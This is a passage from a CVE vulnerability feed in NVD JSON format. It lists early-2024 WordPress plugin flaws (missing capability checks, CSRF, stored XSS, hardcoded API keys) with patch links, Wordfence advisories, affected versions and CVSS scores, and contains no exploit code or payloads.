: [ "Product" ] }, { "url" : "https://developers.hubspot.com/docs/api/webhooks#manage-settings-via-api", "name" : "https://developers.hubspot.com/docs/api/webhooks#manage-settings-via-api", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://developers.hubspot.com/docs/api/webhooks#scopes", "name" : "https://developers.hubspot.com/docs/api/webhooks#scopes", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://developers.hubspot.com/docs/api/webhooks#scopes", "name" : "https://developers.hubspot.com/docs/api/webhooks#scopes", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/wordpress-popup/trunk/inc/providers/hubspot/hustle-hubspot-api.php#L13", "name" : "https://plugins.trac.wordpress.org/browser/wordpress-popup/trunk/inc/providers/hubspot/hustle-hubspot-api.php#L13", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/wordpress-popup/trunk/inc/providers/hubspot/hustle-hubspot-api.php#L13", "name" : "https://plugins.trac.wordpress.org/browser/wordpress-popup/trunk/inc/providers/hubspot/hustle-hubspot-api.php#L13", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3047775/wordpress-popup/trunk/inc/providers/hubspot/hustle-hubspot-api.php?old=3025070&old_path=wordpress-popup/tags/7.8.3/inc/providers/hubspot/hustle-hubspot-api.php", "name" : "https://plugins.trac.wordpress.org/changeset/3047775/wordpress-popup/trunk/inc/providers/hubspot/hustle-hubspot-api.php?old=3025070&old_path=wordpress-popup/tags/7.8.3/inc/providers/hubspot/hustle-hubspot-api.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3047775/wordpress-popup/trunk/inc/providers/hubspot/hustle-hubspot-api.php?old=3025070&old_path=wordpress-popup/tags/7.8.3/inc/providers/hubspot/hustle-hubspot-api.php", "name" : "https://plugins.trac.wordpress.org/changeset/3047775/wordpress-popup/trunk/inc/providers/hubspot/hustle-hubspot-api.php?old=3025070&old_path=wordpress-popup/tags/7.8.3/inc/providers/hubspot/hustle-hubspot-api.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/e6d40b41-540d-476d-afde-970845543933?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/e6d40b41-540d-476d-afde-970845543933?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/e6d40b41-540d-476d-afde-970845543933?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/e6d40b41-540d-476d-afde-970845543933?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Hustle – Email Marketing, Lead Generation, Optins, Popups plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.8.3 via hardcoded API Keys. This makes it possible for unauthenticated attackers to extract sensitive data including PII." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:wpmudev:hustle:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "7.8.4", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "CHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 8.6, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 4.0 } }, "publishedDate" : "2024-03-13T16:15Z", "lastModifiedDate" : "2025-03-11T16:51Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0369", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-862" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/bulk-edit-post-titles/trunk/classes/class.bulk.titles.php#L130", "name" : "https://plugins.trac.wordpress.org/browser/bulk-edit-post-titles/trunk/classes/class.bulk.titles.php#L130", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/bulk-edit-post-titles/trunk/classes/class.bulk.titles.php#L130", "name" : "https://plugins.trac.wordpress.org/browser/bulk-edit-post-titles/trunk/classes/class.bulk.titles.php#L130", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/cad19306-6eef-4f80-9442-e7b314b3a873?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/cad19306-6eef-4f80-9442-e7b314b3a873?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/cad19306-6eef-4f80-9442-e7b314b3a873?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/cad19306-6eef-4f80-9442-e7b314b3a873?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Bulk Edit Post Titles plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the bulkUpdatePostTitles function in all versions up to, and including, 5.0.0. This makes it possible for authenticated attackers, with subscriber access and above, to modify the titles of arbitrary posts." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:pawaryogesh1989:bulk_edit_post_titles:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "5.0.0", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-03-13T16:15Z", "lastModifiedDate" : "2025-03-11T16:38Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0370", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-862" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/3c4c8113-4c46-4179-9c7f-9d5d4337254d?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/3c4c8113-4c46-4179-9c7f-9d5d4337254d?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/3c4c8113-4c46-4179-9c7f-9d5d4337254d?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/3c4c8113-4c46-4179-9c7f-9d5d4337254d?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Views for WPForms – Display & Edit WPForms Entries on your site frontend plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'save_view' function in all versions up to, and including, 3.2.2. This makes it possible for authenticated attackers, with subscriber access and above, to modify the titles of arbitrary posts." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:formviewswp:views_for_wpforms:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "3.2.2", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-02-05T22:16Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0371", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-862" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/a9565693-fd0b-4412-944c-81b3cd79492e?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/a9565693-fd0b-4412-944c-81b3cd79492e?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/a9565693-fd0b-4412-944c-81b3cd79492e?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/a9565693-fd0b-4412-944c-81b3cd79492e?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Views for WPForms – Display & Edit WPForms Entries on your site frontend plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'create_view' function in all versions up to, and including, 3.2.2. This makes it possible for authenticated attackers, with subscriber access and above, to create form views." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:formviewswp:views_for_wpforms:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "3.2.2", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-02-05T22:16Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0372", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-862" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/2ab58add-ab81-4c84-b773-7daf382492b0?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/2ab58add-ab81-4c84-b773-7daf382492b0?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/2ab58add-ab81-4c84-b773-7daf382492b0?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/2ab58add-ab81-4c84-b773-7daf382492b0?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Views for WPForms – Display & Edit WPForms Entries on your site frontend plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'get_form_fields' function in all versions up to, and including, 3.2.2. This makes it possible for authenticated attackers, with subscriber access and above, to create form views." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:formviewswp:views_for_wpforms:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "3.2.2", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-02-05T22:16Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0373", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-352" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/e2273c53-bc8a-45c7-914d-a3b934c2cb18?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/e2273c53-bc8a-45c7-914d-a3b934c2cb18?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/e2273c53-bc8a-45c7-914d-a3b934c2cb18?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/e2273c53-bc8a-45c7-914d-a3b934c2cb18?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Views for WPForms – Display & Edit WPForms Entries on your site frontend plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.2.2. This is due to missing or incorrect nonce validation on the 'save_view' function. This makes it possible for unauthenticated attackers to modify arbitrary post titles via a forged request granted they can trick a site administrator into performing an action such as clicking on a link." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:formviewswp:views_for_wpforms:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "3.2.2", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-02-05T22:16Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0374", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-352" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/34c0c676-37f9-49f2-ad50-2d70831fda53?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/34c0c676-37f9-49f2-ad50-2d70831fda53?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/34c0c676-37f9-49f2-ad50-2d70831fda53?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/34c0c676-37f9-49f2-ad50-2d70831fda53?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Views for WPForms – Display & Edit WPForms Entries on your site frontend plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.2.2. This is due to missing or incorrect nonce validation on the 'create_view' function. This makes it possible for unauthenticated attackers to create views via a forged request granted they can trick a site administrator into performing an action such as clicking on a link." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:formviewswp:views_for_wpforms:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "3.2.2", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-02-05T22:16Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0376", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3022824/premium-addons-for-elementor/trunk/modules/premium-wrapper-link/module.php", "name" : "https://plugins.trac.wordpress.org/changeset/3022824/premium-addons-for-elementor/trunk/modules/premium-wrapper-link/module.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3022824/premium-addons-for-elementor/trunk/modules/premium-wrapper-link/module.php", "name" : "https://plugins.trac.wordpress.org/changeset/3022824/premium-addons-for-elementor/trunk/modules/premium-wrapper-link/module.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/0f9eb9cb-ead9-4ddf-b40b-a0ce2f4910f6?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/0f9eb9cb-ead9-4ddf-b40b-a0ce2f4910f6?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/0f9eb9cb-ead9-4ddf-b40b-a0ce2f4910f6?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/0f9eb9cb-ead9-4ddf-b40b-a0ce2f4910f6?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Premium Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Wrapper Link Widget in all versions up to, and including, 4.10.16 due to insufficient input sanitization and output escaping on user supplied URLs. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:leap13:premium_addons_for_elementor:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "4.10.16", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-04-09T19:15Z", "lastModifiedDate" : "2025-01-09T15:13Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0377", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-862" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3036762/lifterlms/tags/7.5.2/includes/class.llms.review.php?old=2903997&old_path=lifterlms/trunk/includes/class.llms.review.php", "name" : "https://plugins.trac.wordpress.org/changeset/3036762/lifterlms/tags/7.5.2/includes/class.llms.review.php?old=2903997&old_path=lifterlms/trunk/includes/class.llms.review.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3036762/lifterlms/tags/7.5.2/includes/class.llms.review.php?old=2903997&old_path=lifterlms/trunk/includes/class.llms.review.php", "name" : "https://plugins.trac.wordpress.org/changeset/3036762/lifterlms/tags/7.5.2/includes/class.llms.review.php?old=2903997&old_path=lifterlms/trunk/includes/class.llms.review.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/d1f41400-5c59-444d-9c1e-121e83449521?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/d1f41400-5c59-444d-9c1e-121e83449521?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/d1f41400-5c59-444d-9c1e-121e83449521?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/d1f41400-5c59-444d-9c1e-121e83449521?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The LifterLMS – WordPress LMS Plugin for eLearning plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'process_review' function in all versions up to, and including, 7.5.1. This makes it possible for unauthenticated attackers to publish an unrestricted number of reviews on the site." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:lifterlms:lifterlms:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "7.5.2", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-03-13T16:15Z", "lastModifiedDate" : "2025-01-23T19:50Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0378", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3043570%40ai-engine&new=3043570%40ai-engine&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3043570%40ai-engine&new=3043570%40ai-engine&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3043570%40ai-engine&new=3043570%40ai-engine&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3043570%40ai-engine&new=3043570%40ai-engine&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/54344300-6288-40bc-b539-3dc9b555ed00?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/54344300-6288-40bc-b539-3dc9b555ed00?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/54344300-6288-40bc-b539-3dc9b555ed00?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/54344300-6288-40bc-b539-3dc9b555ed00?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { 